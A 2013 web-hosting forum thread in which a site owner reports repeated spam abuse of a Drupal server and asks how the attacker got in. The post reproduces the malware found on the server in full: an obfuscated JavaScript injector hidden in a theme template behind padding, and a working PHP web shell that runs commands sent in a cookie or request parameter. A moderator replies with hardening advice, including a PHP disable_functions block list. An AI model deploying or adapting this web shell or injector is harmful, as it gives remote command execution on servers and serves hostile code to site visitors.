Server/site got hacked multiple times

Discussion in 'General' started by hermestrismegistus, Sep 16, 2013.

  1. hermestrismegistus

    hermestrismegistus New Member

    Hello people,

    This weekend i where for ones where in troubles... Again.

    Saterday morning i woke up and checked as always my ispconfig admin panel and the logs, because lately i got hacked severall times with the goal to send spam from my server. Two times even the server crashed, because to many emails got returned.

    The first time my server had spam abuse, i discovered by looking at the email logs that all the spam got sended with [email protected]. (Since one of my websites has a directory web10 root directory, so i assumed, this probably would be the website that got exploited some way or the other.)

    It happend that this was a websites i made myself(I`m not a security expert) so it didn't surprise me that this was the case. Because i had noticed that spam was the only purpose they hacked the websites, i decided to disable all the webmail parts. I did expect to discover this way, if this would solve the spam problem. It did atleast for a while, but then all the suddenly booom...server down, and indeed as you would expect, spam was the cause.

    Since my old website was not secure enough, i decided to replace my website for a drupal 7.23 version, atleast for a while. For a while nothing happend, but saturday morning, when i where just checking the logs. When i wanted to log in to my drupal site, i had all suddenly a php error. When looking in the error logs i found this:

    Code:
    2013] [warn] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '<' in /var/www/clients/client1/web10/web/themes/seven/template.php on line 144
    [Sat Sep 14 11:53:20 2013] [warn] [client 143.176.53.243] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '<' in /var/www/clients/client1/web10/web/themes/seven/template.php on line 144, referer: https://www.astrobusinessclub.nl/
    [Sat Sep 14 12:19:08
    So when i logged in to the ftp and looked inside the template i found something scary at the bottom of it.

    Code:
    <?
    #a9a007#
                                                                                                                                                                                                                                                              if(empty($tokk)) { $tokk = " <script type=\"text/javascript\" language=\"javascript\"> jtgx=\"spl\"+\"i\"+\"t\";xttq=window;joobzh=\"0\"+\"x\";hzmer=(5-3-1);try{--(document[\"body\"])}catch(ztf){wnwsjy=false;try{}catch(sfckzc){wnwsjy=21;}if(1){suha=\"17:5d:6c:65:5a:6b:60:66:65:17:58:65:5c:6b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:58:65:5c:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:58:65:5c:6b:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:61:6c:6a:6b:63:58:6c:5e:5f:60:65:5e:25:5a:66:64:25:58:6c:26:6a:5a:69:60:67:6b:6a:26:5b:6b:5b:25:67:5f:67:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2f:2b:2a:27:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2f:2b:2a:27:67:6f:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2f:2b:2a:27:67:6f:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2f:2b:2a:27:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2f:2b:2a:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:65:5c:6b:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:58:65:5c:6b:53:1e:17:5a:63:58:6a:6a:34:53:1e:58:65:5c:6b:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:65:5c:6b:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:58:65:5c:6b:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:58:65:5c:6b:27:30:1f:20:32:4:1:74:4:1:74\"[jtgx](\":\");}xttq=suha;tpjm=[];for(xrufi=22-20-2;-xrufi+1425!=0;xrufi+=1){max=xrufi;if((0x19==031))tpjm+=String.fromCharCode(eval(joobzh+xttq[1*max])+0xa-hzmer);}cspnn=eval;cspnn(tpjm)}</script> "; echo $tokk; }
    #/a9a007#
    ?>

    When looking a bit more trough the error logs, i noticed even something more scarry, it seemed there was even a file that shouldn't have been in the profile directory of drupal.

    Code:
    2013] [warn] mod_fcgid: stderr: PHP Notice:  Undefined index: XERATUTA in /var/www/clients/client1/web10/web/profiles/4nJDt3MC.php on line 72
    [Mon Sep 09 09:44:10 2013] [warn] [client 150.217.155.58] mod_fcgid: stderr: PHP Notice:  Undefined index: XERATUTA in /var/www/clients/client1/web10/web/profiles/4nJDt3MC.php on line 73
    [Mon Sep 09 09:44:10 2013] [warn] [client 150.217.155.58] mod_fcgid: stderr: PHP Notice:  Undefined index: XERATUTA in /var/www/clients/client1/web10/web/profiles/4nJDt3MC.php on line 74
    [Mon Sep 09 16:56:39
    
    When looking in this file, i found the following:

    Code:
    <?php
    //curl -v --cookie "XERATUTA=w" URL
    //adjust system variables
    if([email protected]($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}
    //die with error
    function x_die($m)[email protected]('HTTP/1.1 500 '.$m);@die();}
    //check if we can exec
    define('has_passthru',@function_exists('passthru'));
    define('has_system',@function_exists('system'));
    define('has_shell_exec',@function_exists('shell_exec'));
    define('has_popen',@function_exists('popen'));
    define('has_proc_open',@function_exists('proc_open'));
    define('has_exec',@function_exists('exec'));
    define('can_exec',(has_passthru||has_system||has_shell_exec||has_popen||has_proc_open||has_exec));
    if(!can_exec){x_die('can not exec: no functions available');}
    //check if we can config
    define('has_ini_get',@function_exists('ini_get'));
    define('has_ini_get_all',@function_exists('ini_get_all'));
    define('can_config',(has_ini_get||has_ini_get_all));
    if(!can_config){x_die('can not config');}
    //get config value
    function x_ini_get($n){if(has_ini_get){return(@ini_get($n));}elseif(has_ini_get_all)[email protected]_get_all();return($h[$n]['local_value']);}}
    // check safe mode
    if(x_ini_get('safe_mode')){x_die('can not exec: safe mode active');}
    //smart exec helpers
    function x_passthru($c)[email protected]($c);}
    function x_system($c)[email protected]($c);}
    function x_shell_exec($c){echo @shell_exec($c);}
    function x_popen($c){$o;if(([email protected]($c,'r'))){while([email protected]($f))[email protected]($f);[email protected]($f);}echo $o;}
    function x_proc_open($c){$o;if(@is_resource([email protected]_open($c,array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')),$f)))[email protected]($f[0]);while([email protected]($f[1]))[email protected]($f[1]);[email protected]($f[1]);@proc_close($p);}echo $o;}
    function x_exec($c){$o;@exec($c,$o);echo @implode("\n",$o);}
    //do smart fetch
    function x_superfetch($a,$p,$r,$l) {
            if([email protected]($a,$p)) {
                    if([email protected]($l,"wb")) {
                            @fwrite($s,"GET ".$r." HTTP/1.0\r\n\r\n");
                            while([email protected]($s)) {
                                    [email protected]($s,8192);
                                    @fwrite($f,$b);
                            }
                            @fclose($f);
                            echo "OK\n";
                    }
                    @fclose($s);
            }
    }
    //do smart exec
    function x_smart_exec($c) {
            if($c==="which superfetch 1> /dev/null 2> /dev/null && echo OK") {
                    echo "OK\n";
            }
            elseif(@strstr($c,"superfetch")) {
                    [email protected](' ',$c);
                    x_superfetch($a[1],$a[2],$a[3],$a[4]);
            }
            elseif(has_passthru){x_passthru($c);}
            elseif(has_system){x_system($c);}
            elseif(has_shell_exec){x_shell_exec($c);}
            elseif(has_popen){x_popen($c);}
            elseif(has_proc_open){x_proc_open($c);}
            elseif(has_exec){x_exec($c);}
    }
    //go
    $n='XERATUTA';
    $c=$_COOKIE[$n];
    if(@empty($c)){$c=$_POST[$n];}
    if(@empty($c)){$c=$_GET[$n];}
    if(@get_magic_quotes_gpc()){$c=stripslashes($c);}
    x_smart_exec($c);
    ?>
    This is what truly scared my off bigtime, i deleted the file right away and reuploaded the template.php file, but the spam kept going on. Finally disabled postfix. Did some reading and installed mod-security which seemed to have sovled the problem for now. Later on i found out more php files seemed to have the injected code in it. All these files where part of default templates in drupal.

    This pretty much scared me off. Till now with mod-security things seem to have been solved. But what i wonder is, is it really drupal that got hacked? Or is the server self hacked....

    I really can use all the help in the world, to find out more. Because it wouldn't surprise me that i have stopped the spam for only a couple of days. So any tips/help is appreciated to find out what exactly gets exploited.
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Most likely just drupal was hacked, not your server. If the server would have been hacked, the files would be hidden somewhere else and not in the drupal website directory. Also installing mod-security would not have helped if your server was hacked.

    But nevertheless you should ceck your server with rkhunter and chkrootkit to see if there were any rootkits found.

    Installing mod-security was a good choice as it can help to protect your website against such attacks.
     
  3. hermestrismegistus

    hermestrismegistus New Member

    Thanx till, i where expecting the same. Tough it made my slightly paranoia.

    Are there more things that could prevent my drupal site from being hacked at the server side? Extra security like mod_security seems to be of great importance then.
     
  4. till

    till Super Moderator Staff Member ISPConfig Developer

    Ensure that you use the right php mode, I recommend to use either php-fcgi or php-fpm and suexec has to be enabled. This ensures that all php scripts are run under the user of this website.

    - harden php by disabling functions that allow the executeion of programs or scripts in that website. For example, add:

    Code:
    disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo
    this line in the custom php.ini field of the site. There might be more functions to be excluded or it might be that joomla needs some of these functions, the above is just meant as an example and starting point.
     

Share This Page